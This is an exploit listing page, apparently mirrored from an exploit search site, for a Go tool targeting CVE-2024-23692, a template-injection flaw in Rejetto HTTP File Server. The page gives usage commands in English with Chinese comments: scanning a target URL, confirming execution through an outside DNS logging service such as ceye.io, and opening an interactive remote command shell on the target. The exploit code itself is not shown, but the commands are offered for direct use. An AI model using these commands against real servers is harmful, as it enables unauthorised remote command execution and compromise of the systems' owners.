Exploit for Improper Neutralization of Special Elements Used in a Template Engine in Rejetto Http File Server CVE-2024-23692

Name: Exploit for Improper Neutralization of Special Elements Used in a Template Engine in Rejetto Http File Server CVE-2024-23692
Rating: 5 (238 reviews)

2024-06-17 | CVSS 9.8

## https://sploitus.com/exploit?id=CE3B0AC3-96AC-59B0-A761-82C07F3CC4A6
## CVE-2024-23692

#### Usage: go run hfs.go -h
![1](https://github.com/BBD-YZZ/CVE-2024-23692/blob/master/img/0.PNG)

#### go run hfs.go -u http://127.0.0.1
![1](https://github.com/BBD-YZZ/CVE-2024-23692/blob/master/img/1.png)

#### go run hfs.go -u http://127.0.0.1 -dns  //默认使用ceye.io(需配置)
#### go run hfs.go -u http://127.0.0.1 -dns -d abc.cn  //指定dnslog
![1](https://github.com/BBD-YZZ/CVE-2024-23692/blob/master/img/2.png)

#### go run hfs.go -u http://127.0.0.1 -cmd  //进入命令行
![1](https://github.com/BBD-YZZ/CVE-2024-23692/blob/master/img/3.PNG)

*Tips: DNSLOG检测默认使用ceye.io, 如需使用请配置config目录下config.ini配置文件*

*未打包exe,可自行打包*